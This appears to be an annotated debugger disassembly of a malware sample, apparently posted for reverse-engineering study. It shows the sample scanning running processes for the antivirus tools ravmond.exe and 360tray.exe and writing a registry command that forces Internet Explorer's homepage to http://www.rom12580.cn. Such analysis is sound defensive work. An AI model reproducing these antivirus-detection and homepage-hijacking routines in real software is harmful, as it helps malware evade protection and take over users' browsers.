00404019 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
0040401D |. 6A 00 PUSH 0 ; /ProcessID = 0
0040401F |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404021 |. E8 D2D7FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot //创建进程快照准备查找进程
00404026 |. 8BF0 MOV ESI,EAX
00404028 |. 8D85 C8FEFFFF LEA EAX,DWORD PTR SS:[EBP-138]
0040402E |. 50 PUSH EAX ; /pProcessentry
0040402F |. 56 PUSH ESI ; |hSnapshot
00404030 |. C785 C8FEFFFF>MOV DWORD PTR SS:[EBP-138],128 ; |
0040403A |. E8 B3D7FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
0040403F |> 85C0 /TEST EAX,EAX
00404041 |. 74 3D |JE SHORT 复件_123.00404080
00404043 |. 8D85 ECFEFFFF |LEA EAX,DWORD PTR SS:[EBP-114]
00404049 |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
0040404C |. 50 |PUSH EAX
0040404D |. E8 60D4FFFF |CALL <JMP.&MFC42.#860_??4CString@@QAEAB>
00404052 |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00404055 |. E8 72D5FFFF |CALL <JMP.&MFC42.#4202_?MakeLower@CStri>
0040405A |. 68 74E24300 |PUSH 复件_123.0043E274 ; ASCII "ravmond.exe"
0040405F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00404062 |. E8 5FD5FFFF |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00404067 |. 83F8 FF |CMP EAX,-1
0040406A |. 75 0F |JNZ SHORT 复件_123.0040407B
0040406C |. 8D85 C8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-138]
00404072 |. 50 |PUSH EAX ; /pProcessentry
00404073 |. 56 |PUSH ESI ; |hSnapshot
00404074 |. E8 73D7FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404079 |.^ EB C4 \JMP SHORT 复件_123.0040403F
0040407B |> 6A 01 PUSH 1
0040407D |. 5E POP ESI
0040407E |. EB 09 JMP SHORT 复件_123.00404089
00404080 |> 56 PUSH ESI ; /hObject
00404081 |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00404087 |. 33F6 XOR ESI,ESI
00404089 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040408D |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00404090 |. E8 17D4FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00404095 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00404098 |. 8BC6 MOV EAX,ESI
0040409A |. 5E POP ESI
0040409B |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004040A2 |. C9 LEAVE
004040A3 \. C3 RETN
00404389 /$ 55 PUSH EBP
0040438A |. 8BEC MOV EBP,ESP
0040438C |. 81EC 30020000 SUB ESP,230
00404392 |. 53 PUSH EBX
00404393 |. 33DB XOR EBX,EBX
00404395 |. 53 PUSH EBX ; /ProcessID = 0
00404396 |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404398 |. E8 5BD4FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
0040439D |. 8D8D D4FEFFFF LEA ECX,DWORD PTR SS:[EBP-12C]
004043A3 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
004043A6 |. 51 PUSH ECX ; /pProcessentry
004043A7 |. 50 PUSH EAX ; |hSnapshot
004043A8 |. C785 D4FEFFFF>MOV DWORD PTR SS:[EBP-12C],128 ; |
004043B2 |. E8 3BD4FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
004043B7 |. 85C0 TEST EAX,EAX
004043B9 |. 74 70 JE SHORT 复件_123.0040442B
004043BB |. 56 PUSH ESI
004043BC |. 8B35 50504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA
004043C2 |. 57 PUSH EDI
004043C3 |. BF F0E34300 MOV EDI,复件_123.0043E3F0 ; ASCII "Find 360 Process"
004043C8 |> 8D85 F8FEFFFF /LEA EAX,DWORD PTR SS:[EBP-108]
004043CE |. 68 E4E34300 |PUSH 复件_123.0043E3E4 ; /s2 = "360tray.exe"
004043D3 |. 50 |PUSH EAX ; |s1
004043D4 |. FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr
004043DA |. 59 |POP ECX
004043DB |. 85C0 |TEST EAX,EAX
004043DD |. 59 |POP ECX
004043DE |. 75 18 |JNZ SHORT 复件_123.004043F8
004043E0 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004043E6 |. 68 D8E34300 |PUSH 复件_123.0043E3D8 ; /s2 = "360TRAY.EXE"
004043EB |. 50 |PUSH EAX ; |s1
004043EC |. FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr
004043F2 |. 59 |POP ECX
004043F3 |. 85C0 |TEST EAX,EAX
004043F5 |. 59 |POP ECX
004043F6 |. 74 1E |JE SHORT 复件_123.00404416
004043F8 |> 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004043FE |. 50 |PUSH EAX ; /src
004043FF |. 8D85 D0FDFFFF |LEA EAX,DWORD PTR SS:[EBP-230] ; |
00404405 |. 50 |PUSH EAX ; |dest
00404406 |. E8 C7D1FFFF |CALL <JMP.&MSVCRT.strcpy> ; \strcpy
0040440B |. 8B9D DCFEFFFF |MOV EBX,DWORD PTR SS:[EBP-124]
00404411 |. 59 |POP ECX
00404412 |. 59 |POP ECX
00404413 |. 57 |PUSH EDI
00404414 |. FFD6 |CALL ESI
00404416 |> 8D85 D4FEFFFF |LEA EAX,DWORD PTR SS:[EBP-12C]
0040441C |. 50 |PUSH EAX ; /pProcessentry
0040441D |. FF75 FC |PUSH DWORD PTR SS:[EBP-4] ; |hSnapshot
00404420 |. E8 C7D3FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404425 |. 85C0 |TEST EAX,EAX
00404427 |.^ 75 9F \JNZ SHORT 复件_123.004043C8
00404429 |. 5F POP EDI
0040442A |. 5E POP ESI
0040442B |> FF75 FC PUSH DWORD PTR SS:[EBP-4] ; /hObject
0040442E |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00404434 |. 33C0 XOR EAX,EAX
00404436 |. 3BC3 CMP EAX,EBX
00404438 |. 5B POP EBX
00404439 |. 1BC0 SBB EAX,EAX
0040443B |. F7D8 NEG EAX
0040443D |. C9 LEAVE
0040443E \. C3 RETN
004041DA /$ B8 20194000 MOV EAX,123.00401920
004041DF |. E8 0CD4FFFF CALL 123.004015F0
004041E4 |. 81EC 14020000 SUB ESP,214
004041EA |. 56 PUSH ESI
004041EB |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004041EE |. E8 0ACFFFFF CALL 123.004010FD
004041F3 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
004041F7 |. BE 04010000 MOV ESI,104
004041FC |. 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220]
00404202 |. 56 PUSH ESI ; /BufSize = 104 (260.)
00404203 |. 50 PUSH EAX ; |Buffer
00404204 |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA //获取windows系统目录
0040420A |. 56 PUSH ESI ; /n => 104 (260.)
0040420B |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] ; |
00404211 |. 6A 00 PUSH 0 ; |c = 00
00404213 |. 50 PUSH EAX ; |s
00404214 |. E8 3BD4FFFF CALL <JMP.&MSVCRT.memset> ; \memset
00404219 |. 8A85 E0FDFFFF MOV AL,BYTE PTR SS:[EBP-220]
0040421F |. 68 48E34300 PUSH 123.0043E348 ; /src = ":\Program Files\Internet Explorer\IEXPLORE.EXE"
00404224 |. 8885 E5FEFFFF MOV BYTE PTR SS:[EBP-11B],AL ; |
0040422A |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] ; |
00404230 |. 50 PUSH EAX ; |dest
00404231 |. C685 E4FEFFFF>MOV BYTE PTR SS:[EBP-11C],22 ; |
00404238 |. E8 9BD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040423D |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404243 |. 68 44E34300 PUSH 123.0043E344 ; /src = """
00404248 |. 50 PUSH EAX ; |dest
00404249 |. E8 8AD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040424E |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404254 |. 68 40E34300 PUSH 123.0043E340 ; /src = " "
00404259 |. 50 PUSH EAX ; |dest
0040425A |. E8 79D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040425F |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404265 |. 68 28E34300 PUSH 123.0043E328 ; /src = "http://www.rom12580.cn"
0040426A |. 50 PUSH EAX ; |dest
0040426B |. E8 68D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
00404270 |. 83C4 2C ADD ESP,2C
00404273 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00404276 |. 68 E0E24300 PUSH 123.0043E2E0 ; ASCII "CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command"
0040427B |. 68 00000080 PUSH 80000000
00404280 |. E8 E6CEFFFF CALL 123.0040116B //写入到注册表
00404285 |. 85C0 TEST EAX,EAX
00404287 |. 5E POP ESI
00404288 |. 75 11 JNZ SHORT 123.0040429B
0040428A |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404290 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00404293 |. 50 PUSH EAX
00404294 |. 6A 00 PUSH 0
00404296 |. E8 A8DDFFFF CALL 123.00402043 //将IEXPLORE.EXE后添加http://www.rom12580.cn
0040429B |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040429F |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004042A2 |. E8 8BCEFFFF CALL 123.00401132 //关闭注册表
004042A7 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004042AA |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004042B1 |. C9 LEAVE
004042B2 \. C3 RETN
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
